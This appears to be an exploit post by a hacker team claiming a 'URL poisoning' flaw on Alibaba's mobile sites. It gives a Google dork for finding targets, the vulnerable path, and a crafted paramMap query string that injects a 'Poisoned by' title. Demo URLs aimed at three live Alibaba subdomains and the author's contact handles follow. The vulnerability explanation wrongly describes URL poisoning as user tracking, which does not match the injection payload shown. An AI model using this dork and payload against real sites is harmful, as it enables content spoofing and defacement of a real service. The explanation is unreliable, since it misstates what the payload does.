############################################################# # Exploit Title: Alibaba Group - URL Poisoning # Google Dork: site:m.*.alibaba.com inurl:/stream.html? # Date: 2020-09-29 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: alibaba.com # Software Version: * # Software Link: N/A # Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT Tue Sep 29 14:54:50 CST 2020 aarch64 Android ############################################################# [*] Vuln Info: ============== URL poisoning, also known as location poisoning, is a method of tracking Web user behavior by adding an identification (ID) number to the page address (Uniform Resource Locator) line of the Web browser when a user visits a particular site. ############################################################# [*] Vulnerable path: ==================== /stream.htm ############################################################# [*] Exploit: ============ /stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D ############################################################# [*] Demo: ========= https://m.arabic.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D https://m.spanish.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D https://m.french.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D ############################################################# [*] Contact: ============ # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1